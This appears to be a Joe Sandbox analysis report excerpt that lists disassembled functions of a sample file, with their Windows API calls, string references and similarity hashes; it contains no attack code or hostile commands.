Part of subcall function 00BCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
Part of subcall function 00BCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
Part of subcall function 00BCB568: IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
Part of subcall function 00BCB568: TranslateMessage.USER32(?), ref: 00BCB5AC
Part of subcall function 00BCB568: DispatchMessageW.USER32(?), ref: 00BCB5B6

GetDlgItem.USER32(00000068,00C0FCB8), ref: 00BCD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00BCAF07,00000001,?,?,00BCB7B9,00BE506C,00C0FCB8,00C0FCB8,00001000,00000000,00000000), ref: 00BCD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BCD51B
SendMessageW.USER32(00000000,000000C2,00000000,00BE35F4), ref: 00BCD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BCD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BCD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00BE43F4), ref: 00BCD5F0

Strings

\, xrefs: 00BCD549

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 4ecc733d11a369bba3287e55843ae9aabc9d8be312155403ae9b38632433a3d0
Instruction ID: eaab790f0bc454dd3d4788c67d65605872e2f69a91e92387dd4fbaa32ffda179
Opcode Fuzzy Hash: 4ecc733d11a369bba3287e55843ae9aabc9d8be312155403ae9b38632433a3d0
Instruction Fuzzy Hash: 3631BE71245382ABE301DF209C4AFAF7BECFB96708F004558F551962A0DB658A05C776

Function 00BCD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00BCD7AE
ShellExecuteExW.SHELL32(?), ref: 00BCD8DE
ShowWindow.USER32(?,00000000), ref: 00BCD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00BCD959
CloseHandle.KERNEL32(?), ref: 00BCD97F
ShowWindow.USER32(?,00000001), ref: 00BCD9E1

Strings

.exe, xrefs: 00BCD989
.inf, xrefs: 00BCD89A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 83f978db8c9ae103664bd653c255738d4472656a47a8e43c6c45b6477a7c6bdd
Instruction ID: a88240a73515f7266d488e730a6c9d92c29a2e6b681d7f32cbeeab73539ee1b6
Opcode Fuzzy Hash: 83f978db8c9ae103664bd653c255738d4472656a47a8e43c6c45b6477a7c6bdd
Instruction Fuzzy Hash: D651D47C504380AAEB309B249844FBFBBE4EF86744F0448BEF5C597191E7B49A85C752

Function 00BDA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BD5695,00BD5695,?,?,?,00BDABAC,00000001,00000001,2DE85006), ref: 00BDA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BDABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BDAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BDAB35
__freea.LIBCMT ref: 00BDAB42

Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38

__freea.LIBCMT ref: 00BDAB4B
__freea.LIBCMT ref: 00BDAB70

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 5ff3eb1a95326627bf83865840b38cd9d4efb7b35fcfffe1460c83351c987c27
Instruction ID: a48365496eca46c3424c36c64122e19966bf5a434e487af2c8d6e115bff02349
Opcode Fuzzy Hash: 5ff3eb1a95326627bf83865840b38cd9d4efb7b35fcfffe1460c83351c987c27
Instruction Fuzzy Hash: 4851A072610216ABDB258F64CC81EBAF7EAEB44754F1546ABFC04D6240FB74DC41C6A2

Function 00BD3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00BD3C35,?,?,00C12088,00000000,?,00BD3D60,00000004,InitializeCriticalSectionEx,00BE6394,InitializeCriticalSectionEx,00000000), ref: 00BD3C03

Strings

api-ms-, xrefs: 00BD3BC3

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 8ecb1ebc8a0238b8ae154cfb082170d56399d028e8b83771b758758d551d90c7
Instruction ID: 169ee824aa428975252d36f175108f8bcf1800ebb0339389c5a089490a484860
Opcode Fuzzy Hash: 8ecb1ebc8a0238b8ae154cfb082170d56399d028e8b83771b758758d551d90c7
Instruction Fuzzy Hash: 1D119431A45221ABCB218B589C85759B7E4DB01F70F1501A3E915FB391F761EF008AD2

Function 00BCAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
Part of subcall function 00BC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858

OleInitialize.OLE32(00000000), ref: 00BCAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BCAC66
SHGetMalloc.SHELL32(00BF8438), ref: 00BCAC70

Strings

3Ro, xrefs: 00BCAC47
riched20.dll, xrefs: 00BCAC1E

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 41226f1967810c1d82c09cce241c2e67c9d472a379588ee4b4b8170ed6a84bae
Instruction ID: da4f6811e102ba33da76ffcd102d9e3e01fef9b6ab291867f2961296bcb09dfc
Opcode Fuzzy Hash: 41226f1967810c1d82c09cce241c2e67c9d472a379588ee4b4b8170ed6a84bae
Instruction Fuzzy Hash: 8AF0F9B5900249ABCB10AFA9D849AEFFBFCEF85704F00819AA415E2251DBB456058FA1

Function 00BB98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00BB7760,?,00000005,?,00000011), ref: 00BB995F
GetLastError.KERNEL32(?,?,00BB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00BB7760,?,00000005,?), ref: 00BB99A2
GetLastError.KERNEL32(?,?,00BB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB99F9

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: cb7554d992a069e8d03e27dc1a60c1851d57d6eccc2de2608ee2bccc2ab9c6f3
Instruction ID: c4012f84c8d020288036ed1d66a4e660f5d8fd4eadf0ddcf8cc6177b10aca9e4
Opcode Fuzzy Hash: cb7554d992a069e8d03e27dc1a60c1851d57d6eccc2de2608ee2bccc2ab9c6f3
Instruction Fuzzy Hash: 1A31C030544785AFE7309F24CC8ABEABBE4FB44320F200B59FAE1961D1D7E4A954CB95

Function 00BCB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
TranslateMessage.USER32(?), ref: 00BCB5AC
DispatchMessageW.USER32(?), ref: 00BCB5B6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: c606f5630ec59482d3fea678115cf02cbc3d9e876687e85d1e82d0e2ab671842
Instruction ID: 7fed78115184d5a7c45ef36ce5dcdde9f7349da44fdf9be9cfaf33ac88524172
Opcode Fuzzy Hash: c606f5630ec59482d3fea678115cf02cbc3d9e876687e85d1e82d0e2ab671842
Instruction Fuzzy Hash: DAF0BD71A0115AAB8B209BE59C4DFEF7FECEE062957008415B509D2010EB74D605CBB0

Function 00BCABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00BCABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00BCABF9

Part of subcall function 00BC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BBC116,00000000,.exe,?,?,00000800,?,?,?,00BC8E3C), ref: 00BC1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BCABE9

Strings

EDIT, xrefs: 00BCABCD, 00BCABD8, 00BCABE5

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 27dfaf97536447c0e7a8c40bb3c97f34c70d30aba13618a6bc6a3edda985573e
Instruction ID: 2603df93008849e0845e2620f4381204da9b35766cfd88a795242cfbe059af68
Opcode Fuzzy Hash: 27dfaf97536447c0e7a8c40bb3c97f34c70d30aba13618a6bc6a3edda985573e
Instruction Fuzzy Hash: 5BF0823660026876DB2096259C09FDF76ECAB47B44F4880A9BA05F21C0D760DE4186B6

Function 00BB9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BB9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00BB97AD
GetLastError.KERNEL32 ref: 00BB97DF
GetLastError.KERNEL32 ref: 00BB97FE

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 59b3c85509a242d9f5e22d846fe7ad4c69c886a1faacbf03e1f7ca46eb37deee
Instruction ID: 49e873d80c6f0fdc3e7b00de410d7ad362b367eb8360b9942df8169bddb806cf
Opcode Fuzzy Hash: 59b3c85509a242d9f5e22d846fe7ad4c69c886a1faacbf03e1f7ca46eb37deee
Instruction Fuzzy Hash: 3811C230910614EBDF205F26CC44AF93BE9FB067A0F1089AAF61686190DBF08E44DB61

Function 00BDAD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BD3F73,00000000,00000000,?,00BDACDB,00BD3F73,00000000,00000000,00000000,?,00BDAED8,00000006,FlsSetValue), ref: 00BDAD66
GetLastError.KERNEL32(?,00BDACDB,00BD3F73,00000000,00000000,00000000,?,00BDAED8,00000006,FlsSetValue,00BE7970,FlsSetValue,00000000,00000364,?,00BD98B7), ref: 00BDAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BDACDB,00BD3F73,00000000,00000000,00000000,?,00BDAED8,00000006,FlsSetValue,00BE7970,FlsSetValue,00000000), ref: 00BDAD80

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5d1e25bdbfe31c67e718eab7591700ad2c4b03a95f600ef4c3a54b2be062b958
Instruction ID: 217f154f8825634b00eeb61ab07fa6ae5a5377faa0db5b01af3703f13129434b
Opcode Fuzzy Hash: 5d1e25bdbfe31c67e718eab7591700ad2c4b03a95f600ef4c3a54b2be062b958
Instruction Fuzzy Hash: FE01FC36201226ABC7214E789CC8A57FBD9EF15B627110671F906D7760EB20D901CAE1

Function 00BB9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00BBD343,00000001,?,?,?,00000000,00BC551D,?,?,?), ref: 00BB9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00BC551D,?,?,?,?,?,00BC4FC7,?), ref: 00BB9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00BBD343,00000001,?,?), ref: 00BBA011

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: a4e368c1c5ccd91e7dc5df984697fcf33553c97d3d6d6683df80f82b985a37c1
Instruction ID: b11a1a1c0e5fcc622f05e02a4a2558fae28f55415410a3b6375c1baf25c631b3
Opcode Fuzzy Hash: a4e368c1c5ccd91e7dc5df984697fcf33553c97d3d6d6683df80f82b985a37c1
Instruction Fuzzy Hash: E131C031604345EFDB14DF24D858BBE77E5EF84B20F004959FA819B290CBB5AD48CBA2

Function 00BBA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00BBC27E: _wcslen.LIBCMT ref: 00BBC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA30C
GetLastError.KERNEL32(?,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA329

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: b5c9d9850a77cd2efea72df2c2e4a6269985d0b190e4f33260c60f834b4a51c3
Instruction ID: f18a921a76ca93487cc22ddae5aed4ec5a0af1f2db0a7f46c7fa739603047ead
Opcode Fuzzy Hash: b5c9d9850a77cd2efea72df2c2e4a6269985d0b190e4f33260c60f834b4a51c3
Instruction Fuzzy Hash: 390175319006546BEF21AB754C59BFD36D8DF09781F0444D5F902D6191DBE4CA8186BA

Function 00BDB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BDB8B8

Strings

, xrefs: 00BDB8FD

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 3925c6dd1122441a5126d6ef4b48b99709bf93f63c7e9a2e3f0792777dc1031b
Instruction ID: 2c6e8450962c6706f03449f96e5b770d61d459afa3fe803cbda81854d4d50479
Opcode Fuzzy Hash: 3925c6dd1122441a5126d6ef4b48b99709bf93f63c7e9a2e3f0792777dc1031b
Instruction Fuzzy Hash: 8B41D87090438CDADF218E648C94FFAFBE9DB55304F1404EEE59A87242E739AA45DB60

Function 00BDAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

